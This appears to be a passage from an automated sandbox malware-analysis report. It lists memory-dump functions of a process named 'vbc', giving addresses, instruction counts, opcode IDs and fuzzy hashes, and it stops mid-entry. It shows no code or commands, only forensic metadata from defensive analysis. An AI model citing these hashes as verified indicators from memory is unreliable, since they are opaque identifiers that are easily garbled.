                                                                                                    • Opcode ID: 5bc141da5b7a0a025f77ea1401ab7ba5cc2cc5457f90ad4439633479a11af7fd
                                                                                                    • Instruction ID: 7852bcb9c53b1ee7a43b02e38e3062db0d8e625b5fe2817b02b4a99b53bde424
                                                                                                    • Opcode Fuzzy Hash: 5bc141da5b7a0a025f77ea1401ab7ba5cc2cc5457f90ad4439633479a11af7fd
                                                                                                    • Instruction Fuzzy Hash: 87C04C31D0D3C4AFD70A5E115C121D43FB0792620275A82DB9C49C9266D37C5A148769
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00525220 Relevance: .8, Instructions: 756COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ee38fd73264308c9a6fadaf0409399da0ce2bc1491012cf49fb82b38f3925da
                                                                                                    • Instruction ID: 83aa6e4cbe911f4ea29a27b9acaa78ef8d5097e2c93a3f5f6a522a6b399b0bfa
                                                                                                    • Opcode Fuzzy Hash: 4ee38fd73264308c9a6fadaf0409399da0ce2bc1491012cf49fb82b38f3925da
                                                                                                    • Instruction Fuzzy Hash: A7627A35600514EFDB06AF94D984D6E7BB6FF89304B19C0A4E2069B2BADB31DC11EF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04360068 Relevance: .7, Instructions: 671COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5edd4cd668adaf32d1072a00762789506f5f17d6fe41254027434ceeb3577fd1
                                                                                                    • Instruction ID: f4553d5d940f7577bc41a591bf91d27d1496128db0e93fccae2f433b57fc41b6
                                                                                                    • Opcode Fuzzy Hash: 5edd4cd668adaf32d1072a00762789506f5f17d6fe41254027434ceeb3577fd1
                                                                                                    • Instruction Fuzzy Hash: C932B070F002228FCB29DF28855923D7AF6AB98600F14D55EE887E7385DF709D45EB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522C80 Relevance: .4, Instructions: 446COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a2c49fbbecf67c4d53113bcd5a8f2f91d78b6ea07fd12e5917d7e17b3127090
                                                                                                    • Instruction ID: e8290b05b5739734e5e003221960be36a4cbf936502fe59d3e0a0eaf51160c7b
                                                                                                    • Opcode Fuzzy Hash: 9a2c49fbbecf67c4d53113bcd5a8f2f91d78b6ea07fd12e5917d7e17b3127090
                                                                                                    • Instruction Fuzzy Hash: 36028834B00119DFDB05EBA4E994AAE7BB6FF89300F148429E502EB3D9DB749D01DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054E7E0 Relevance: .4, Instructions: 381COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a625c9bcded81955d5e200aa6d462f3b6735336e35f1dc91f0b188632453d499
                                                                                                    • Instruction ID: 443a444cebaeed0a34f1aceebd6185f488561a62df87ed0014ccbb23ae57dee6
                                                                                                    • Opcode Fuzzy Hash: a625c9bcded81955d5e200aa6d462f3b6735336e35f1dc91f0b188632453d499
                                                                                                    • Instruction Fuzzy Hash: 3502C834A00219DFDB04DFA4D999E9DBBB2FF88304F118159E906AB3A5DB30EC46CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C568 Relevance: .3, Instructions: 337COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5060540c426ab93d2e317d3020effa5e9300c744fb8248fb092c1b4f1052ece
                                                                                                    • Instruction ID: 658e76454e36acb8455636c654c706608c848d34e2eb4b0b6db292422e2c1fd9
                                                                                                    • Opcode Fuzzy Hash: d5060540c426ab93d2e317d3020effa5e9300c744fb8248fb092c1b4f1052ece
                                                                                                    • Instruction Fuzzy Hash: BDC1A630B001249FDB05EF64E89196D7FB7BFC9300F258429E502AB39ADB35ED018B95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362CC0 Relevance: .3, Instructions: 299COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9662cbea7ae783b90db9a061282a303f7bd1f84b703ad547887eb98fcb5b6cbf
                                                                                                    • Instruction ID: 7dec28bf215d99dd5151e4bd46eaa34ce6e7d89548416934c5986c04ba295e07
                                                                                                    • Opcode Fuzzy Hash: 9662cbea7ae783b90db9a061282a303f7bd1f84b703ad547887eb98fcb5b6cbf
                                                                                                    • Instruction Fuzzy Hash: DCA1C430E05255DFC710DF99C491A9EBBF6EF85300F1A84AAE456EBB51CB31EC428B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00520740 Relevance: .3, Instructions: 292COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 75d02306b41e9f9b727b600ee987506e948d655fa4219e5e6c31261d6f41cff1
                                                                                                    • Instruction ID: 196173a38d431963ff9debf8c73fdb311e693bd915ed8527faeebeb5afc4abd8
                                                                                                    • Opcode Fuzzy Hash: 75d02306b41e9f9b727b600ee987506e948d655fa4219e5e6c31261d6f41cff1
                                                                                                    • Instruction Fuzzy Hash: D9A1DF31B015648FCB18B768A45927D3AE3FF9A304F2558A8E517EB3C2CF305E059B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3D10 Relevance: .3, Instructions: 290COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5cd4885df60ab75cbf5eeee5dd581a88716f2ca40ef95ebc38caf6fa6a963b9
                                                                                                    • Instruction ID: 35467b67fff05e0e6b614a90d23df0fb8f94311ccdfff38ea1c844be7f9dfa1c
                                                                                                    • Opcode Fuzzy Hash: d5cd4885df60ab75cbf5eeee5dd581a88716f2ca40ef95ebc38caf6fa6a963b9
                                                                                                    • Instruction Fuzzy Hash: 2DA1E631A041189FCB15DF64C89097FBBF6EBC8301B14852BE616D7355CB399E06CBA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004CE778 Relevance: .3, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604505551.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4c0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3dc8d771924ffeb8f282451e258c60bf6ac7d90216fb74b15cf5fc5af54f2de6
                                                                                                    • Instruction ID: 3a30ddc2990f819067568b0cace44bf60daa213d599d7605f5ea2b7e3a75dbb3
                                                                                                    • Opcode Fuzzy Hash: 3dc8d771924ffeb8f282451e258c60bf6ac7d90216fb74b15cf5fc5af54f2de6
                                                                                                    • Instruction Fuzzy Hash: FB816138B002118BCBB41A674414B3F7AD7FB94750F25843ED906DB384DF3A8C0297A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6560 Relevance: .3, Instructions: 268COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 48fd36e46d277aed0ecca83dbf58e5f7fc4974b11c5f508a875b5dc97a06bc8e
                                                                                                    • Instruction ID: fe0636d286a262824cb12c2af6db955af66171ac1ddc69bb8a282c7bfddd9398
                                                                                                    • Opcode Fuzzy Hash: 48fd36e46d277aed0ecca83dbf58e5f7fc4974b11c5f508a875b5dc97a06bc8e
                                                                                                    • Instruction Fuzzy Hash: EDA1D631A04109DFCB05EFA8D8859BEBBB6FF88344F11C12AE616EB255C7359C02DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362058 Relevance: .3, Instructions: 254COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1156d51e8baa46733b66758c8e852e144a2b5eabbb6dbc456a2428b0aeed634d
                                                                                                    • Instruction ID: a7d0766300f1e9dd743c3219441c0596165da59cc35730e895b5a933a9851070
                                                                                                    • Opcode Fuzzy Hash: 1156d51e8baa46733b66758c8e852e144a2b5eabbb6dbc456a2428b0aeed634d
                                                                                                    • Instruction Fuzzy Hash: A791A030E04246CFCB24DFA9C84199EB7F2EF85300F26D4AAD5566B255DB31AC42CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00544BC8 Relevance: .3, Instructions: 253COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2bccb8c845b2f6ef9d16d029ba1eee29d01bd37fb2c4d3963cda406b3bae675c
                                                                                                    • Instruction ID: ecaf63680f5bc52bb983f9ecd14b5cba965766fe79791a913f29e0f5c0d7a649
                                                                                                    • Opcode Fuzzy Hash: 2bccb8c845b2f6ef9d16d029ba1eee29d01bd37fb2c4d3963cda406b3bae675c
                                                                                                    • Instruction Fuzzy Hash: 2EA16735A452089FCB14CFA5D898BADBBB6FF88305F148069E9029B3A1CB35DD05DF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F72AD Relevance: .2, Instructions: 239COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a5ccaf16147e9ffee403d1cc40ead793e5019a55610b4ddc24823fe4e1b927b8
                                                                                                    • Instruction ID: cded35b140c177c113b53b63ac90b1e7c00892d6332f530c2a7ec451bcb0880b
                                                                                                    • Opcode Fuzzy Hash: a5ccaf16147e9ffee403d1cc40ead793e5019a55610b4ddc24823fe4e1b927b8
                                                                                                    • Instruction Fuzzy Hash: 14916D31A0411DEFCF01DFA8D9859BEBBB6FB88304F25805AEA15A7255C738EC41CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FA2D8 Relevance: .2, Instructions: 233COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3d717a62985e0bd35b6816d37820ebdfb2ea68201ce33fed94282d25654814cf
                                                                                                    • Instruction ID: d6dd58c716a3ea71dd4a9b6acc07616abbe136a60f12725bbac5c409aebfe3ec
                                                                                                    • Opcode Fuzzy Hash: 3d717a62985e0bd35b6816d37820ebdfb2ea68201ce33fed94282d25654814cf
                                                                                                    • Instruction Fuzzy Hash: 5F71F071B042489FCB19DF64C454ABEB7A2EF88354B14802BEA09DB341DB74DD228B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054E7D4 Relevance: .2, Instructions: 231COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aa3e568b213b30e91514f8ccbdaa46062026606613d15291854f127115f1946a
                                                                                                    • Instruction ID: 1795fad8993d273f805b27eeca15a9253f37df7bf5800ec2d11c4a7f141826ae
                                                                                                    • Opcode Fuzzy Hash: aa3e568b213b30e91514f8ccbdaa46062026606613d15291854f127115f1946a
                                                                                                    • Instruction Fuzzy Hash: ADA1ED34A10219DFDB04DFA4D899E9DBBB2FF88304F158159E806AB365DB70EC46CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0436203C Relevance: .2, Instructions: 209COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 28c0e34b7002aaa67d0179bea9182adf96a808e2cc51fafd13fa9b0dfaab127b
                                                                                                    • Instruction ID: ab32e8297ff31eee898e365f3d2d64a9692b5929c530879ce1e152c675100068
                                                                                                    • Opcode Fuzzy Hash: 28c0e34b7002aaa67d0179bea9182adf96a808e2cc51fafd13fa9b0dfaab127b
                                                                                                    • Instruction Fuzzy Hash: EE819D31E04246CFCB24DF99C88199EB7F2FF89300F2694AAD5566B259D732AC42CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540880 Relevance: .2, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3cc3da505b13ba6740831713ca44a5c0bb14470beef7da2d225a66d57eb3e07c
                                                                                                    • Instruction ID: 5d19492ca6ee932313acd283d4b94abc71bd3d09d1eed1f5fd25fa2462ad3f23
                                                                                                    • Opcode Fuzzy Hash: 3cc3da505b13ba6740831713ca44a5c0bb14470beef7da2d225a66d57eb3e07c
                                                                                                    • Instruction Fuzzy Hash: BB617631B04609DFDB04EFA5C991AAEBBB6FF88304F209529D606E7395CB309C01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6551 Relevance: .2, Instructions: 163COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f94d4459a2197de035d1fcf7170c31072b4cb3771a9c472f79db8fec3daf32a
                                                                                                    • Instruction ID: bbfd28df7b87ee50bc37dfe1f24b7d29719653d1530dbe8f87775d33bc78f329
                                                                                                    • Opcode Fuzzy Hash: 2f94d4459a2197de035d1fcf7170c31072b4cb3771a9c472f79db8fec3daf32a
                                                                                                    • Instruction Fuzzy Hash: 6F518174E00118DFDB01EFA8D8859BEBBB6EF88304F11812AE616EB355CB759C01CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F8B90 Relevance: .2, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c377384c6e99b5ae94aaa295545996500a4eeb8c23f560219c7512ecba0167a
                                                                                                    • Instruction ID: 830e40214787f060a7b2205b7b2f69ccc9f11f322e078800664055c4eb3b3052
                                                                                                    • Opcode Fuzzy Hash: 7c377384c6e99b5ae94aaa295545996500a4eeb8c23f560219c7512ecba0167a
                                                                                                    • Instruction Fuzzy Hash: C2616B30A00609CFD714DF64C480EAAB7F2FF89304F2585AAE555AB355DB35ED42CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362658 Relevance: .2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ee9bfc16a5326db45e36b5ac69a1d8f5c5167c395d4798c8db46f161532d12d9
                                                                                                    • Instruction ID: 67061ea3981aa1e0b89024afa7a8d38c5c5e6b559fa2ca18ef177ab22ff9b2b4
                                                                                                    • Opcode Fuzzy Hash: ee9bfc16a5326db45e36b5ac69a1d8f5c5167c395d4798c8db46f161532d12d9
                                                                                                    • Instruction Fuzzy Hash: 4941F731A04245DFCB15DFA5C815D9ABBF6EF49300F0AC09AE556AB362C770EC45CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540871 Relevance: .1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cfb1dbffcb017875f306e34538e7003740fb75506df60dc71c9ee1db860d4033
                                                                                                    • Instruction ID: 349a4d4ebf72362982430bbaaf1a82430b955b049fba9c02c9bc4d4f452b6e8f
                                                                                                    • Opcode Fuzzy Hash: cfb1dbffcb017875f306e34538e7003740fb75506df60dc71c9ee1db860d4033
                                                                                                    • Instruction Fuzzy Hash: 69517131A05609DFDB14EFA5C981AEFBBB6FF88304F249129E606E7295C7349C01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054E3A8 Relevance: .1, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5720781c8cb683c038f406b770ea7d83b31208464c19a0812a9c913e56abeec0
                                                                                                    • Instruction ID: 02854c30b74c2b5291e35f13fa245eec257dd2600c60537e5e45f865ea8ebe88
                                                                                                    • Opcode Fuzzy Hash: 5720781c8cb683c038f406b770ea7d83b31208464c19a0812a9c913e56abeec0
                                                                                                    • Instruction Fuzzy Hash: 75516635710609DFCB04DF64E898AADBBB6FFC9705F008119E502A7364DF34A90ADB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00541B50 Relevance: .1, Instructions: 140COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 19a912341b12ff33fd70397f2ef95cfcfaff4313d87e72050f0f1c98d962e823
                                                                                                    • Instruction ID: 94faf87c4dc83c364fc7c519917585da79fdff604dec6559862ab4da393df65e
                                                                                                    • Opcode Fuzzy Hash: 19a912341b12ff33fd70397f2ef95cfcfaff4313d87e72050f0f1c98d962e823
                                                                                                    • Instruction Fuzzy Hash: E541E736B086814FCB11CF79A8846DABFB1EF92324B19C1EBD448DB183D230D905CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F6A00 Relevance: .1, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0fb01bd365abd04574822505f6d3149a6b74dba7fd1a01e480b4edef79a5f41f
                                                                                                    • Instruction ID: edff0324b9d91386645a0135813c012f2dea7a855199b710cb50e99ad1053361
                                                                                                    • Opcode Fuzzy Hash: 0fb01bd365abd04574822505f6d3149a6b74dba7fd1a01e480b4edef79a5f41f
                                                                                                    • Instruction Fuzzy Hash: E1510835E0451A8FCB04CF98C4819BEBBB2FB89310F26C166D515BB345D634A842CFA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00545300 Relevance: .1, Instructions: 126COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1130616effee6babc1124cc85131404a5758789bbb607771ae4383d22fc34e42
                                                                                                    • Instruction ID: b67073dc5744e589f0cf440d6e80e538f0e0897d11cc3b359546587fbc9e1e62
                                                                                                    • Opcode Fuzzy Hash: 1130616effee6babc1124cc85131404a5758789bbb607771ae4383d22fc34e42
                                                                                                    • Instruction Fuzzy Hash: 1D414B34B007059FCB14DF65D894BAEBBF2FB88309F24C829E505AB291EB71D945DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362480 Relevance: .1, Instructions: 124COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0aff0824317748ba654cda891faf8164626cb1abe3fcf81a7c3d3531a5edae7d
                                                                                                    • Instruction ID: c7b50ebeff993f4a54b4f65378408ba33bb0dafde4aac7ceb9758bd08d8b7fc2
                                                                                                    • Opcode Fuzzy Hash: 0aff0824317748ba654cda891faf8164626cb1abe3fcf81a7c3d3531a5edae7d
                                                                                                    • Instruction Fuzzy Hash: 73311871A047848FCB24DB54C815AAFBBF69B8A300F16C0AAD556BB651C730EC44CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F54A8 Relevance: .1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2427a84efac0d31d53e3a6a7c8821785093c044ec9a444638498e6de6545c4c7
                                                                                                    • Instruction ID: 42f169176c1418acf8e8898f76dc7fada9d3c4c22736c41a8c4de489ff83af24
                                                                                                    • Opcode Fuzzy Hash: 2427a84efac0d31d53e3a6a7c8821785093c044ec9a444638498e6de6545c4c7
                                                                                                    • Instruction Fuzzy Hash: 6341F732A0451DEFCB05EF94D8419BF7BB6EB88300F10812AE719A7254C7359D12DBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362E62 Relevance: .1, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
